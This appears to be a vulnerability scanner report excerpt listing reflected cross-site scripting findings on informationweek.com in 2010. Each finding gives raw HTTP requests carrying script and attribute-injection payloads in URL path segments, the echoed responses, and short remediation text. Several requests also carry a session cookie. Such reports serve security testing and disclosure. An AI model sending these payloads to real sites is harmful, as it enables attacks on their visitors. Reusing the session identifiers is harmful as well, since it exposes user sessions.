GET /news/storaged5322"><script>alert(1)</script>9b23966dcf/data_protection/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:46 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:46 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30315
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storaged5322"><script>alert(1)</script>9b23966dcf/dat;kvarticleid=;kvauthor=;loc=300;grp=893344838" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a520'-alert(1)-'5de69536693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage6a520'-alert(1)-'5de69536693/data_protection/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30267
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage6a520'-alert(1)-'5de69536693/data_protection/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=582660102;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2282'-alert(1)-'081fec8e555 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/data_protectione2282'-alert(1)-'081fec8e555/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30239
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/data_protectione2282'-alert(1)-'081fec8e555/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=920869709;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb34c"><a%20b%3dc>fb2c05626cc was submitted in the REST URL parameter 3. This input was echoed as fb34c"><a b=c>fb2c05626cc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/storage/data_protectionfb34c"><a%20b%3dc>fb2c05626cc/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30253
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/data_protectionfb34c"><a b=c>fb2c05626cc/show;kvarticleid=;kvauthor=;loc=300;grp=783699064" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faac6'-alert(1)-'1cbe64795bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/data_protection/faac6'-alert(1)-'1cbe64795bd HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:05 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:05 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30177
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/data_protection/faac6'-alert(1)-'1cbe64795bd;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=440288387;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4f61'-alert(1)-'57a5eb76caf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsf4f61'-alert(1)-'57a5eb76caf/storage/systems/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30248
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsf4f61'-alert(1)-'57a5eb76caf/storage/systems/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=284287330;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 432a7"><script>alert(1)</script>26975a2ac8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news432a7"><script>alert(1)</script>26975a2ac8d/storage/systems/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30298
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news432a7"><script>alert(1)</script>26975a2ac8d/storage/sy;kvarticleid=;kvauthor=;loc=300;grp=923710056" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64aa5"><script>alert(1)</script>3f36d426111 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/storage64aa5"><script>alert(1)</script>3f36d426111/systems/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30301
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage64aa5"><script>alert(1)</script>3f36d426111/sy;kvarticleid=;kvauthor=;loc=300;grp=263710926" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d262c'-alert(1)-'f03ee8bad27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storaged262c'-alert(1)-'f03ee8bad27/systems/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30239
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storaged262c'-alert(1)-'f03ee8bad27/systems/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=30553092;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80f2d'-alert(1)-'3d1c306f06b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/systems80f2d'-alert(1)-'3d1c306f06b/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30223
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/systems80f2d'-alert(1)-'3d1c306f06b/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=592064166;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38af"><a%20b%3dc>5a436d3b796 was submitted in the REST URL parameter 3. This input was echoed as e38af"><a b=c>5a436d3b796 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/storage/systemse38af"><a%20b%3dc>5a436d3b796/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:23:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30225
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/systemse38af"><a b=c>5a436d3b796/showArticle;kvarticleid=;kvauthor=;loc=300;grp=396796437" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960f0"a%3d"b"589ae9c61ef was submitted in the REST URL parameter 4. This input was echoed as 960f0"a="b"589ae9c61ef in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/storage/systems/showArticle.jhtml960f0"a%3d"b"589ae9c61ef HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:24:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:24:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30179
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/systems/showArticle960f0"a="b"589ae9c61ef;kvarticleid=;kvauthor=;loc=300;grp=808100674" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86883"><script>alert(1)</script>0981919ad59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletters86883"><script>alert(1)</script>0981919ad59/DR_subscribe.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30273
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsletters86883"><script>alert(1)</script>0981919ad59/DR_;kvarticleid=;kvauthor=;loc=300;grp=861803794" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e72'-alert(1)-'281d8c05b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newslettersd8e72'-alert(1)-'281d8c05b5/DR_subscribe.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30124
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newslettersd8e72'-alert(1)-'281d8c05b5/DR_subscribe;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=28082873;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99475"><a%20b%3dc>13b5779542c was submitted in the REST URL parameter 2. This input was echoed as 99475"><a b=c>13b5779542c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /newsletters/99475"><a%20b%3dc>13b5779542c HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30392
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Newsletters_Welcome_Ad_1x1;key=/newsletters/99475"><a b=c>13b5779542c;kvarticleid=;kvauthor=;loc=300;grp=44057614" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c4a6'-alert(1)-'3095eedd6cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
